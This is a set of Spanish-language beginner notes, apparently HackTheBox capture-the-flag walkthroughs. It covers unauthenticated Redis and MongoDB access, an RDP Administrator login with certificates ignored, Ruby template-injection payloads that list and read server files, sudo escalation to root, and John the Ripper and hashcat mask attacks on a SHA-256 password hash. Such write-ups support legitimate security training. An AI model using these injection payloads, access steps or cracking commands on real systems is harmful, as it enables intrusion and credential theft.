0% encontró este documento útil (0 votos)
12 vistas2 páginas

Guía de Hacks para Principiantes

Cargado por

vohebe123
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como TXT, PDF, TXT o lee en línea desde Scribd
0% encontró este documento útil (0 votos)
12 vistas2 páginas

Guía de Hacks para Principiantes

Cargado por

vohebe123
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como TXT, PDF, TXT o lee en línea desde Scribd

HACKTHEBOX

REDEEMER (VERY EASY)

Sistema Redis:

nc -vn IP 6379 -> te conecta nc=ncat


Encontrar credenciales-> AUTH admin (probamos admin, no tiene pass -> ya estamos
dentro)
Enumeracion ->
-INFO
-client list
-CONFIG GET*
Dentro de la base de datos (keyspace)->
-INFO keyspace -> en este caso es la database 0
-SELECT 0 (numero database)
Ya nos sale una key que se llama flag -> GET flag

EXPLOSION (VERY EASY)

3389TCP ---> rdp, en este caso usaremos la rdp de xfreerdp

Nos conectamos con el siguiente comando --> xfreerdp /v:IP /cert-ignore


/u:Administrator

/v:ip -> especifica la ip que quieres conectarte


/cert-ignore -> ignora todos los certificados

MONGOD( VERY EASY)

Te logeas sabiendo usando el HOST (IP de la maquina):


mongo <HOST>

Haces los siguientes comandos para ver databases y te encuentras que hay una llamda
sensitive_information

show dbs
use <sensitive_information>
show collections -> te encuentras collection=Flag
db.<collection>.find() #Dump the collection

db.<collection>.count() #Number of records of the collection


[Link]({"username":"admin"}) #Find in current db the username admin

PERFECTION (EASY)
El NMAP te devuelve que es el puerto 80, buscas la pagina en internet
Dentro del BURPSUITE navegas por la pagina y en la del formulario la mandas a
repeater y en el formulario vas cambiando el category con URL-encoded format --->
[Link]

1º: <%= [Link]('/') %> --> lista los ficheros que tiene, ves que tiene usr,
home y root, pruebas los 3

2º: <%= [Link]('/home') %> ---> ves que en home tiene el user susan
3ª: <%= [Link]('/home/susan') %> ---> ves que tiene el fichero [Link]

4º: <%= [Link]('/home/susan/[Link]').read %> ---> te da la flag

sudo -l ---> te muestra todos lo que puede ejecutar siendo root


sudo su ---> te escala a root

JOHNTHERIPPER--->

.\[Link] .\[Link] --mask=susan_nasus_?d?d?d?d?d?d?d?d?d --format=Raw-SHA256


--> --mask= si sabes algo en concreto de la password, en este caso sabes que
empieza por susan_nasus y va del 1 al [Link] de hay que sea ?d?d?d?d?d?d?d?
d?d --format= añades el formato del hash esto lo buscas en ->
[Link]

--mask -> son 9 numeros por lo tanto es d y una ? delante por cada d
? | Charset
===+=========
l | abcdefghijklmnopqrstuvwxyz
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
d | 0123456789
h | 0123456789abcdef
H | 0123456789ABCDEF
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff

HASHCAT ---->

hashcat -a 3 -m 1400
abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f "susan_nasus_?d?d?
d?d?d?d?d?d?d"
-m 1400 = porque el hash es tipo Raw-SHA256, sacas que es 1400 de aqui
[Link]

-a 3 = siempre a menos que quieras meter una rule que seria= -a 0

También podría gustarte